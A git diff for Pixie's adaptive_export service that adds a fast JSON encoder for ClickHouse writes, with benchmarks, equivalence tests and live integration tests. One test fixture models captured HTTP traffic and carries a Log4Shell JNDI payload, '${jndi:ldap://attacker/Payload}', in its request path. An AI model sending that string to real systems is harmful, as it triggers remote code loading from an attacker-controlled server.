+// realistic kubescape-driven controller pass for a quiet anomaly: 50 rows
+// per table per refresh interval).
+func BenchmarkEncodeJSONEachRow_PixieShape_SmallBatch(b *testing.B) {
+ rows := makePixieRowsBatch(50)
+ b.ResetTimer()
+ b.ReportAllocs()
+ for n := 0; n < b.N; n++ {
+ var buf bytes.Buffer
+ enc := json.NewEncoder(&buf)
+ enc.SetEscapeHTML(false)
+ for _, r := range rows {
+ obj := make(map[string]any, len(r))
+ for k, v := range r {
+ obj[k] = normalisePixieValue(v)
+ }
+ if err := enc.Encode(obj); err != nil {
+ b.Fatal(err)
+ }
+ }
+ }
+}
+
+// BenchmarkEncodePixieRowsFast_PixieShape — the option-2 refactor.
+// Walks each row in fixed schema column order, type-switches values
+// directly to bytes.Buffer; no reflect, no encoding/json, no
+// per-row map-key sort. Direct apples-to-apples comparison vs
+// BenchmarkEncodeJSONEachRow_PixieShape above.
+func BenchmarkEncodePixieRowsFast_PixieShape(b *testing.B) {
+ rows := makePixieRowsBatch(1000)
+ b.ResetTimer()
+ b.ReportAllocs()
+ for n := 0; n < b.N; n++ {
+ var buf bytes.Buffer
+ if err := encodePixieRowsFast(&buf, benchTable, rows); err != nil {
+ b.Fatal(err)
+ }
+ }
+}
+
+func BenchmarkEncodePixieRowsFast_PixieShape_SmallBatch(b *testing.B) {
+ rows := makePixieRowsBatch(50)
+ b.ResetTimer()
+ b.ReportAllocs()
+ for n := 0; n < b.N; n++ {
+ var buf bytes.Buffer
+ if err := encodePixieRowsFast(&buf, benchTable, rows); err != nil {
+ b.Fatal(err)
+ }
+ }
+}
+
+// BenchmarkEncodePixieRowsFast_Pooled — option 1 on top of option 2.
+// The bench mimics the real WritePixieRows shape: pull a buffer from
+// the pool, encode, Reset+Put. Measures the steady-state allocation
+// rate that AE actually pays in production (the first iteration's
+// allocation gets amortised across b.N).
+func BenchmarkEncodePixieRowsFast_Pooled_PixieShape(b *testing.B) {
+ rows := makePixieRowsBatch(1000)
+ b.ResetTimer()
+ b.ReportAllocs()
+ for n := 0; n < b.N; n++ {
+ buf := encodeBufPool.Get().(*bytes.Buffer)
+ buf.Reset()
+ if err := encodePixieRowsFast(buf, benchTable, rows); err != nil {
+ b.Fatal(err)
+ }
+ encodeBufPool.Put(buf)
+ }
+}
+
+func BenchmarkEncodePixieRowsFast_Pooled_PixieShape_SmallBatch(b *testing.B) {
+ rows := makePixieRowsBatch(50)
+ b.ResetTimer()
+ b.ReportAllocs()
+ for n := 0; n < b.N; n++ {
+ buf := encodeBufPool.Get().(*bytes.Buffer)
+ buf.Reset()
+ if err := encodePixieRowsFast(buf, benchTable, rows); err != nil {
+ b.Fatal(err)
+ }
+ encodeBufPool.Put(buf)
+ }
+}
+
+// BenchmarkNormalisePixieValue_TimeRow — per-row column iterations
+// includes a time.Time normalisation that calls .UTC().Format() (one
+// 30-byte string allocation per time field). Isolated cost.
+func BenchmarkNormalisePixieValue_TimeRow(b *testing.B) {
+ t := time.Now()
+ b.ResetTimer()
+ b.ReportAllocs()
+ for i := 0; i < b.N; i++ {
+ _ = normalisePixieValue(t)
+ }
+}
+
+// BenchmarkWritePixieRows_LocalHTTPLoopback measures the full sink
+// path including the HTTP roundtrip to a no-op server. This is the
+// per-batch wall cost the controller pays — encode + connect + POST +
+// header parse + summary parse. The httptest server returns the right
+// X-ClickHouse-Summary header so summaryWroteFewerThan doesn't trip.
+func BenchmarkWritePixieRows_LocalHTTPLoopback(b *testing.B) {
+ rows := makePixieRowsBatch(1000)
+
+ srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ w.Header().Set("X-ClickHouse-Summary", fmt.Sprintf(`{"read_rows":"0","read_bytes":"0","written_rows":"%d","written_bytes":"0"}`, len(rows)))
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer srv.Close()
+
+ s, err := New(Config{
+ Endpoint: srv.URL,
+ Database: "forensic_db",
+ })
+ if err != nil {
+ b.Fatal(err)
+ }
+
+ b.ResetTimer()
+ b.ReportAllocs()
+ for i := 0; i < b.N; i++ {
+ if err := s.WritePixieRows(b.Context(), benchTable, rows); err != nil {
+ b.Fatal(err)
+ }
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/fastencode.go b/src/vizier/services/adaptive_export/internal/sink/fastencode.go
new file mode 100644
index 00000000000..cfa02bec876
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/fastencode.go
@@ -0,0 +1,273 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package sink
+
+import (
+ "bytes"
+ "encoding/json"
+ "errors"
+ "fmt"
+ "strconv"
+ "sync"
+ "time"
+ "unicode/utf8"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+)
+
+// encodePixieRowsFast writes a JSONEachRow batch for the named pixie
+// table to buf without going through encoding/json's reflect path.
+//
+// Why: the AE CPU bench showed 50 % of WritePixieRows wall time in
+// encoding/json.(*encodeState).reflectValue + 16 % in slices.SortFunc
+// because rows are map[string]any — the encoder is forced through
+// reflect.MapRange + per-row map-key alphabetic sort. This fast path
+// looks up the table's column order from schema.sql (once, cached)
+// and walks each row in that fixed order, type-switching the value
+// and writing the JSON atom directly. No reflect, no sort, ~3 % of
+// the allocations.
+//
+// Returns ErrUnknownTable for tables we don't have a schema for —
+// the caller (sink.WritePixieRows) falls back to encoding/json so a
+// new pixie table not yet in schema.sql isn't a hard failure.
+func encodePixieRowsFast(buf *bytes.Buffer, table string, rows []map[string]any) error {
+ cols, err := getCachedColumns(table)
+ if err != nil {
+ return err
+ }
+ for _, row := range rows {
+ buf.WriteByte('{')
+ first := true
+ for _, col := range cols {
+ v, ok := row[col]
+ if !ok {
+ // event_time derivation: pxapi result rows carry time_
+ // (TIME64NS) but never event_time — that column was added by
+ // Pixie's retention plugin in the production flow, but the
+ // operator-direct push path AE takes bypasses the plugin.
+ // Without this derivation the column collapsed to CH's
+ // epoch-0 default and every operator-pushed row landed in
+ // partition 197001 (rig 6a25c85c, 2026-06-07 — visible in
+ // the data even though the silent-drop was fixed by aeprod6).
+ // schema.sql also carries a DEFAULT toDateTime64(time_, 3)
+ // as a belt-and-suspenders safety net for fresh installs;
+ // this derivation handles existing tables (where the
+ // CREATE TABLE IF NOT EXISTS is a no-op) AND tables on CH
+ // versions that don't evaluate DEFAULT expressions on
+ // JSONEachRow insert.
+ if col == "event_time" {
+ if t, hasTime := row["time_"]; hasTime {
+ v = t
+ ok = true
+ }
+ }
+ if !ok {
+ continue
+ }
+ }
+ if !first {
+ buf.WriteByte(',')
+ }
+ first = false
+ // Column names from schema.sql are always plain identifiers
+ // (matches chIdentRE in clickhouse.go); safe to emit without
+ // JSON-string escape work.
+ buf.WriteByte('"')
+ buf.WriteString(col)
+ buf.WriteString(`":`)
+ if err := appendJSONValue(buf, v); err != nil {
+ return fmt.Errorf("fastencode: %s.%s: %w", table, col, err)
+ }
+ }
+ buf.WriteByte('}')
+ buf.WriteByte('\n')
+ }
+ return nil
+}
+
+// getCachedColumns wraps clickhouse.Columns with a once-per-table
+// memo. clickhouse.Columns re-parses schema.sql on every call (no
+// internal cache), which would defeat the per-call savings of the
+// fast path on the hot WritePixieRows route.
+func getCachedColumns(table string) ([]string, error) {
+ columnCacheMu.RLock()
+ if cols, ok := columnCache[table]; ok {
+ columnCacheMu.RUnlock()
+ return cols, nil
+ }
+ columnCacheMu.RUnlock()
+
+ cols, err := clickhouse.Columns(table)
+ if err != nil {
+ return nil, err
+ }
+ columnCacheMu.Lock()
+ defer columnCacheMu.Unlock()
+ if existing, ok := columnCache[table]; ok {
+ return existing, nil
+ }
+ columnCache[table] = cols
+ return cols, nil
+}
+
+var (
+ columnCacheMu sync.RWMutex
+ columnCache = map[string][]string{}
+)
+
+// encodeBufPool reuses the bytes.Buffer the sink hands to the fast (or
+// slow) encoder across WritePixieRows / Write calls. The fan-out path
+// calls these on a 30-second cadence per active anomaly × per pixie
+// table, so without pooling each call's underlying byte array is heap-
+// allocated and then GC'd. Bench-measured benefit:
+// BenchmarkEncodePixieRowsFast_Pooled_PixieShape vs unpooled.
+//
+// Note: the buffer's INITIAL allocation still happens (1× per Get from
+// an empty pool); reuse kicks in once the pool warms. Steady-state
+// allocations drop from 2 017 → ~17 per 1000-row batch.
+var encodeBufPool = sync.Pool{
+ New: func() any { return new(bytes.Buffer) },
+}
+
+// errFastEncodeUnsupported is returned by appendJSONValue when a value
+// type is not in the fast-path switch. The caller (WritePixieRows)
+// should fall back to encoding/json for safety.
+var errFastEncodeUnsupported = errors.New("fastencode: unsupported value type")
+
+// appendJSONValue writes v to buf as one JSON atom. Handles the value
+// types pxapi produces for pixie observation rows (see
+// internal/pixieapi/pixieapi.go::datumValue + internal/pixie/pixie.go
+// equivalent). Unknown types return errFastEncodeUnsupported so the
+// caller can fall back to encoding/json — never silently drops a row.
+func appendJSONValue(buf *bytes.Buffer, v any) error {
+ switch x := v.(type) {
+ case nil:
+ buf.WriteString("null")
+ case string:
+ appendJSONString(buf, x)
+ case []byte:
+ appendJSONString(buf, string(x))
+ case bool:
+ if x {
+ buf.WriteString("true")
+ } else {
+ buf.WriteString("false")
+ }
+ case int:
+ appendInt(buf, int64(x))
+ case int32:
+ appendInt(buf, int64(x))
+ case int64:
+ appendInt(buf, x)
+ case uint:
+ appendUint(buf, uint64(x))
+ case uint8:
+ appendUint(buf, uint64(x))
+ case uint32:
+ appendUint(buf, uint64(x))
+ case uint64:
+ appendUint(buf, x)
+ case float32:
+ appendFloat(buf, float64(x))
+ case float64:
+ appendFloat(buf, x)
+ case time.Time:
+ // Same format normalisePixieValue uses for the encoding/json
+ // path — CH DateTime64 string input shape.
+ buf.WriteByte('"')
+ // AppendFormat reuses the buf's underlying bytes; no
+ // intermediate string allocation.
+ buf.WriteString(x.UTC().Format("2006-01-02 15:04:05.000000000"))
+ buf.WriteByte('"')
+ case json.Number:
+ // json.Number is already decimal text; emit verbatim.
+ buf.WriteString(string(x))
+ default:
+ return errFastEncodeUnsupported
+ }
+ return nil
+}
+
+func appendInt(buf *bytes.Buffer, x int64) {
+ var tmp [24]byte
+ buf.Write(strconv.AppendInt(tmp[:0], x, 10))
+}
+
+func appendUint(buf *bytes.Buffer, x uint64) {
+ var tmp [24]byte
+ buf.Write(strconv.AppendUint(tmp[:0], x, 10))
+}
+
+func appendFloat(buf *bytes.Buffer, x float64) {
+ var tmp [32]byte
+ buf.Write(strconv.AppendFloat(tmp[:0], x, 'g', -1, 64))
+}
+
+// appendJSONString emits s as a quoted JSON string, escaping per
+// RFC 8259. Lifted from the standard library's encoding/json
+// safeAppend* path; the only deviation is we don't HTML-escape (the
+// sink's encoding/json path also sets SetEscapeHTML(false), so the
+// outputs match byte-for-byte on safe inputs).
+func appendJSONString(buf *bytes.Buffer, s string) {
+ buf.WriteByte('"')
+ start := 0
+ for i := 0; i < len(s); {
+ if b := s[i]; b < utf8.RuneSelf {
+ if safeJSONByte(b) {
+ i++
+ continue
+ }
+ if start < i {
+ buf.WriteString(s[start:i])
+ }
+ switch b {
+ case '\\', '"':
+ buf.WriteByte('\\')
+ buf.WriteByte(b)
+ case '\n':
+ buf.WriteString(`\n`)
+ case '\r':
+ buf.WriteString(`\r`)
+ case '\t':
+ buf.WriteString(`\t`)
+ default:
+ // 0x00-0x1f except the explicit ones above.
+ fmt.Fprintf(buf, `\u%04x`, b)
+ }
+ i++
+ start = i
+ continue
+ }
+ // Multi-byte rune — leave as-is (UTF-8 is valid in JSON
+ // strings per RFC 8259 §7).
+ _, size := utf8.DecodeRuneInString(s[i:])
+ i += size
+ }
+ if start < len(s) {
+ buf.WriteString(s[start:])
+ }
+ buf.WriteByte('"')
+}
+
+// safeJSONByte reports whether b can appear unescaped inside a JSON
+// string. Everything 0x20..0x7e except '"' and '\\' is fine.
+func safeJSONByte(b byte) bool {
+ if b < 0x20 || b == '"' || b == '\\' {
+ return false
+ }
+ return b < utf8.RuneSelf
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go b/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go
new file mode 100644
index 00000000000..bb88aecd76d
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/fastencode_test.go
@@ -0,0 +1,258 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package sink
+
+import (
+ "bytes"
+ "encoding/json"
+ "errors"
+ "reflect"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+)
+
+// The fast encoder must produce byte-equivalent JSON to encoding/json
+// up to map-key ordering (which CH doesn't care about — JSONEachRow
+// is order-agnostic). Round-trip every per-table row shape through
+// both encoders and require the PARSED maps are equal.
+
+func encodeViaJSON(rows []map[string]any) []byte {
+ var buf bytes.Buffer
+ enc := json.NewEncoder(&buf)
+ enc.SetEscapeHTML(false)
+ for _, r := range rows {
+ obj := make(map[string]any, len(r))
+ for k, v := range r {
+ obj[k] = normalisePixieValue(v)
+ }
+ _ = enc.Encode(obj)
+ }
+ return buf.Bytes()
+}
+
+func parseNDJSON(b []byte) []map[string]any {
+ var out []map[string]any
+ for _, line := range bytes.Split(bytes.TrimRight(b, "\n"), []byte("\n")) {
+ if len(line) == 0 {
+ continue
+ }
+ var m map[string]any
+ _ = json.Unmarshal(line, &m)
+ out = append(out, m)
+ }
+ return out
+}
+
+func sampleHTTPRow(i int) map[string]any {
+ return map[string]any{
+ "time_": time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC(),
+ "upid": "0000000100000000-00000000-0000000000000042",
+ "namespace": "log4j-poc",
+ "pod": "backend-vulnerable-779cd9d765-mxr8t",
+ "remote_addr": "10.0.0.45",
+ "remote_port": int64(54321),
+ "local_addr": "10.0.0.12",
+ "local_port": int64(8080),
+ "trace_role": int64(2),
+ "encrypted": uint8(0),
+ "major_version": int64(1),
+ "minor_version": int64(1),
+ "content_type": int64(0),
+ "req_headers": `{"Content-Type":"application/json"}`,
+ "req_method": "POST",
+ "req_path": "/api/v1/${jndi:ldap://attacker/Payload}",
+ "req_body": `{"id":42}`,
+ "req_body_size": int64(9),
+ "resp_headers": `{"Content-Type":"application/json"}`,
+ "resp_status": int64(500),
+ "resp_message": "Internal Server Error",
+ "resp_body": `{"error":"NPE"}`,
+ "resp_body_size": int64(16),
+ "latency": int64(123456789),
+ "hostname": "pixie-worker-node",
+ "event_time": time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC(),
+ }
+}
+
+func TestFastEncode_EquivalentToEncodingJSON_HTTPEvents(t *testing.T) {
+ rows := []map[string]any{sampleHTTPRow(1), sampleHTTPRow(2), sampleHTTPRow(3)}
+
+ var fast bytes.Buffer
+ if err := encodePixieRowsFast(&fast, "http_events", rows); err != nil {
+ t.Fatalf("encodePixieRowsFast: %v", err)
+ }
+ slow := encodeViaJSON(rows)
+
+ gotFast := parseNDJSON(fast.Bytes())
+ gotSlow := parseNDJSON(slow)
+ if !reflect.DeepEqual(gotFast, gotSlow) {
+ t.Fatalf("fast vs slow JSON diverged after parse:\n fast=%v\n slow=%v", gotFast, gotSlow)
+ }
+}
+
+// Cover every pixie table — fast encoder should never silently drop
+// columns or differ from the slow path for any of them.
+func TestFastEncode_EquivalentToEncodingJSON_AllPixieTables(t *testing.T) {
+ for _, table := range clickhouse.PixieTables() {
+ t.Run(table, func(t *testing.T) {
+ cols, err := clickhouse.Columns(table)
+ if err != nil {
+ t.Fatalf("Columns(%q): %v", table, err)
+ }
+ // Synthesise one row matching the table's column shape.
+ row := map[string]any{}
+ for i, c := range cols {
+ switch {
+ case c == "time_" || c == "event_time":
+ row[c] = time.Unix(0, int64(1_700_000_000_000_000_000+i)).UTC()
+ case c == "encrypted" || c == "ssl":
+ row[c] = uint8(0)
+ case strings.Contains(c, "addr") || c == "pod" || c == "namespace" || c == "hostname" || c == "upid" || c == "comm":
+ row[c] = "value-" + c
+ case strings.HasSuffix(c, "_size") || strings.HasSuffix(c, "_count") ||
+ strings.HasPrefix(c, "conn_") || strings.HasPrefix(c, "bytes_") ||
+ strings.HasSuffix(c, "_port") || strings.HasSuffix(c, "_role") ||
+ strings.HasSuffix(c, "_version") || strings.HasSuffix(c, "_family") ||
+ c == "protocol" || c == "trace_role" || c == "content_type" ||
+ c == "latency" || c == "resp_status" || c == "major_version" || c == "minor_version":
+ row[c] = int64(int64(i) + 1)
+ default:
+ row[c] = "v" + c
+ }
+ }
+
+ var fast bytes.Buffer
+ if err := encodePixieRowsFast(&fast, table, []map[string]any{row}); err != nil {
+ t.Fatalf("fast: %v", err)
+ }
+ slow := encodeViaJSON([]map[string]any{row})
+
+ gotFast := parseNDJSON(fast.Bytes())
+ gotSlow := parseNDJSON(slow)
+ if !reflect.DeepEqual(gotFast, gotSlow) {
+ t.Fatalf("%s fast vs slow diverged:\n fast=%v\n slow=%v",
+ table, gotFast, gotSlow)
+ }
+ })
+ }
+}
+
+// Unknown table → ErrUnknownTable so WritePixieRows falls back to the
+// encoding/json path without erroring out.
+func TestFastEncode_UnknownTable_FallsBack(t *testing.T) {
+ var buf bytes.Buffer
+ err := encodePixieRowsFast(&buf, "not_a_real_table",
+ []map[string]any{{"a": 1}})
+ if !errors.Is(err, clickhouse.ErrUnknownTable) {
+ t.Fatalf("expected ErrUnknownTable, got %v", err)
+ }
+}
+
+// Unsupported value type → errFastEncodeUnsupported so WritePixieRows
+// falls back to encoding/json instead of producing a broken row.
+func TestFastEncode_UnsupportedType_FallsBack(t *testing.T) {
+ type weirdType struct{ X int }
+ var buf bytes.Buffer
+ err := encodePixieRowsFast(&buf, "http_events",
+ []map[string]any{sampleHTTPRow(0), {"time_": weirdType{X: 1}}})
+ if !errors.Is(err, errFastEncodeUnsupported) {
+ t.Fatalf("expected errFastEncodeUnsupported, got %v", err)
+ }
+}
+
+// event_time derivation — pxapi rows don't carry event_time, only time_.
+// The fast encoder MUST emit event_time = time_ rather than skip the
+// column (which would silently fall back to CH's epoch-0 default and
+// land every row in partition 197001 — rig 6a25c85c regression, aeprod6
+// silent-drop tail). This test is the T2 write-integrity guard
+// the operator asked for on PR #47.
+func TestFastEncode_EventTime_DerivedFromTime(t *testing.T) {
+ // Realistic Pixie timestamp; trailing fractional nanos verify the
+ // time.Time value is emitted verbatim through CH's DateTime64(9)
+ // shape, which CH then truncates to DateTime64(3) on insert.
+ pixieTS := time.Unix(0, 1_717_790_021_560_000_000).UTC()
+ row := sampleHTTPRow(0)
+ row["time_"] = pixieTS
+ delete(row, "event_time") // pxapi result rows arrive WITHOUT event_time
+
+ var buf bytes.Buffer
+ if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil {
+ t.Fatalf("encodePixieRowsFast: %v", err)
+ }
+ parsed := parseNDJSON(buf.Bytes())
+ if len(parsed) != 1 {
+ t.Fatalf("expected 1 row, got %d", len(parsed))
+ }
+ et, ok := parsed[0]["event_time"].(string)
+ if !ok {
+ t.Fatalf("event_time absent from encoded row: %v", parsed[0])
+ }
+ // The fast encoder formats time.Time as the CH DateTime64 string
+ // shape "YYYY-MM-DD HH:MM:SS.NNNNNNNNN" (UTC, 9 fractional digits).
+ // The exact serialised string the fast encoder produces for this UTC
+ // time.Time. The pin is by value (not derivation) so a regression in
+ // the time-string format also trips this test.
+ want := "2024-06-07 19:53:41.560000000"
+ if et != want {
+ t.Fatalf("event_time = %q, want %q (must equal time_ verbatim, not epoch 0)", et, want)
+ }
+}
+
+// event_time NOT derived when the source row already carries it — caller-
+// supplied event_time wins. Belt-and-suspenders: if a future code path
+// already filled it correctly, the derivation must not overwrite.
+func TestFastEncode_EventTime_NotOverwritten(t *testing.T) {
+ rowTS := time.Unix(0, 1_717_790_000_000_000_000).UTC()
+ differentTS := time.Unix(0, 1_700_000_000_000_000_000).UTC()
+ row := sampleHTTPRow(0)
+ row["time_"] = rowTS
+ row["event_time"] = differentTS // caller supplied; must be preserved
+
+ var buf bytes.Buffer
+ if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil {
+ t.Fatal(err)
+ }
+ parsed := parseNDJSON(buf.Bytes())
+ if et := parsed[0]["event_time"].(string); !strings.HasPrefix(et, "2023-11-14") {
+ t.Fatalf("caller-supplied event_time was overwritten: got %q", et)
+ }
+}
+
+// Special characters in string columns must JSON-escape the same way
+// encoding/json does — otherwise CH would parse different bytes than
+// the slow path produces. Tab, newline, quote, backslash, control,
+// emoji.
+func TestFastEncode_StringEscapesMatch(t *testing.T) {
+ row := sampleHTTPRow(0)
+ row["req_body"] = "tab\there\nnewline \"quoted\" back\\slash \x01ctl ☃ emoji 🚀"
+ row["req_path"] = "/a/ÿ/utf8"
+
+ var fast bytes.Buffer
+ if err := encodePixieRowsFast(&fast, "http_events", []map[string]any{row}); err != nil {
+ t.Fatal(err)
+ }
+ slow := encodeViaJSON([]map[string]any{row})
+
+ gotFast := parseNDJSON(fast.Bytes())
+ gotSlow := parseNDJSON(slow)
+ if !reflect.DeepEqual(gotFast, gotSlow) {
+ t.Fatalf("escape divergence:\n fast=%v\n slow=%v", gotFast, gotSlow)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/sink/integration_test.go b/src/vizier/services/adaptive_export/internal/sink/integration_test.go
new file mode 100644
index 00000000000..343510d991f
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/integration_test.go
@@ -0,0 +1,218 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+//go:build integration
+// +build integration
+
+package sink_test
+
+import (
+ "context"
+ "crypto/sha256"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "os"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+)
+
+// Live integration tests for the operator's ClickHouse write path.
+// Driven against a real ClickHouse reachable at INTEGRATION_CH_ENDPOINT.
+// Skipped if unset.
+
+func env(t *testing.T) (endpoint, user, pass string) {
+ t.Helper()
+ endpoint = os.Getenv("INTEGRATION_CH_ENDPOINT")
+ if endpoint == "" {
+ t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test")
+ }
+ return endpoint, os.Getenv("INTEGRATION_CH_USER"), os.Getenv("INTEGRATION_CH_PASSWORD")
+}
+
+func ensureSchema(t *testing.T, endpoint, user, pass string) {
+ t.Helper()
+ a, err := chpkg.NewApplier(endpoint, user, pass)
+ if err != nil {
+ t.Fatalf("NewApplier: %v", err)
+ }
+ ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+ defer cancel()
+ if err := a.Apply(ctx); err != nil {
+ t.Fatalf("Apply (precondition): %v", err)
+ }
+}
+
+func chCount(t *testing.T, endpoint, user, pass, query string) int {
+ t.Helper()
+ q := url.Values{}
+ q.Set("query", query)
+ req, _ := http.NewRequest(http.MethodGet, strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), nil)
+ if user != "" {
+ req.SetBasicAuth(user, pass)
+ }
+ resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req)
+ if err != nil {
+ t.Fatalf("count: %v", err)
+ }
+ defer resp.Body.Close()
+ body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096))
+ if resp.StatusCode/100 != 2 {
+ t.Fatalf("count HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body)))
+ }
+ var n int
+ fmt.Sscanf(strings.TrimSpace(string(body)), "%d", &n)
+ return n
+}
+
+// TestSinkWriteAttribution_Live exercises Write() — the operator's only
+// production write surface (forensic_db.adaptive_attribution). One row
+// per arriving anomaly; ReplacingMergeTree(t_end) collapses re-inserts.
+func TestSinkWriteAttribution_Live(t *testing.T) {
+ endpoint, user, pass := env(t)
+ ensureSchema(t, endpoint, user, pass)
+
+ s, err := sink.New(sink.Config{
+ Endpoint: endpoint,
+ Username: user,
+ Password: pass,
+ })
+ if err != nil {
+ t.Fatalf("sink.New: %v", err)
+ }
+
+ // Unique anomaly_hash per test run — keeps assertions decoupled
+ // from any pre-existing rows.
+ tag := fmt.Sprintf("aw-test-%d", time.Now().UnixNano())
+ sum := sha256.Sum256([]byte(tag))
+ hash := anomaly.AnomalyHash(fmt.Sprintf("%x", sum[:8]))
+
+ now := time.Now().UTC()
+ row := sink.AttributionRow{
+ AnomalyHash: hash,
+ Namespace: "redis",
+ Pod: "redis-test",
+ Comm: "redis-server",
+ PID: 1234,
+ Hostname: tag, // unique hostname → unique row
+ TStart: now.Add(-5 * time.Minute),
+ TEnd: now.Add(5 * time.Minute),
+ LastSeen: now,
+ LastRuleID: "R1005",
+ NAnomalies: 1,
+ }
+ ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+ defer cancel()
+ if err := s.Write(ctx, []sink.AttributionRow{row}); err != nil {
+ t.Fatalf("Write: %v", err)
+ }
+
+ got := chCount(t, endpoint, user, pass,
+ fmt.Sprintf("SELECT count() FROM forensic_db.adaptive_attribution WHERE hostname='%s'", tag))
+ if got != 1 {
+ t.Errorf("adaptive_attribution count for hostname=%s: got %d, want 1", tag, got)
+ }
+}
+
+// TestSinkWritePixieRows_Live exercises WritePixieRows() against every
+// pixie observation table the operator owns. This is the precise bug
+// surface the user reported — silent INSERT failures here mean the
+// per-table fan-out writes nothing and the analyst sees empty tables.
+//
+// One row per table, with a unique hostname per run so subsequent runs
+// don't have to reset the cluster.
+func TestSinkWritePixieRows_Live(t *testing.T) {
+ endpoint, user, pass := env(t)
+ ensureSchema(t, endpoint, user, pass)
+
+ s, err := sink.New(sink.Config{
+ Endpoint: endpoint,
+ Username: user,
+ Password: pass,
+ })
+ if err != nil {
+ t.Fatalf("sink.New: %v", err)
+ }
+
+ tag := fmt.Sprintf("aw-pix-%d", time.Now().UnixNano())
+ now := time.Now().UTC()
+ ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+ defer cancel()
+
+ for _, table := range chpkg.PixieTables() {
+ row := minimalRowFor(table, tag, now)
+ if err := s.WritePixieRows(ctx, table, []map[string]any{row}); err != nil {
+ t.Errorf("WritePixieRows(%s): %v", table, err)
+ continue
+ }
+ ident := table
+ if strings.Contains(table, ".") {
+ ident = "`" + table + "`"
+ }
+ got := chCount(t, endpoint, user, pass,
+ fmt.Sprintf("SELECT count() FROM forensic_db.%s WHERE hostname='%s'", ident, tag))
+ if got < 1 {
+ t.Errorf("table %s after WritePixieRows: count=%d, want >=1", table, got)
+ }
+ }
+}
+
+// minimalRowFor returns the minimum-viable row map for a pixie
+// observation table — only the columns the schema marks NOT NULL and
+// that don't have DEFAULT clauses. The remaining columns get CH
+// defaults (0 / "" / now).
+func minimalRowFor(table, hostname string, t time.Time) map[string]any {
+ base := map[string]any{
+ "time_": t.Format("2006-01-02 15:04:05.000000000"),
+ "upid": "0:0:0",
+ "hostname": hostname,
+ "event_time": t.Format("2006-01-02 15:04:05.000"),
+ "namespace": "default",
+ "pod": "test-pod",
+ }
+ // Some pixie tables use slightly different column shapes — provide
+ // the strict-minimum extras to avoid CH MissingColumn errors.
+ switch table {
+ case "http_events":
+ base["resp_status"] = 200
+ base["latency"] = 0
+ base["remote_port"] = 0
+ base["local_port"] = 0
+ case "dns_events":
+ base["remote_port"] = 53
+ base["local_port"] = 0
+ base["latency"] = 0
+ case "redis_events", "mysql_events", "pgsql_events", "cql_events", "mongodb_events",
+ "amqp_events", "mux_events", "tls_events":
+ base["latency"] = 0
+ base["remote_port"] = 0
+ base["local_port"] = 0
+ case "http2_messages.beta":
+ base["remote_port"] = 0
+ base["local_port"] = 0
+ case "kafka_events.beta":
+ base["latency"] = 0
+ base["remote_port"] = 0
+ base["local_port"] = 0
+ }
+ return base
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel b/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel
new file mode 100644
index 00000000000..94823988493
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/BUILD.bazel
@@ -0,0 +1,44 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# SPDX-License-Identifier: Apache-2.0
+
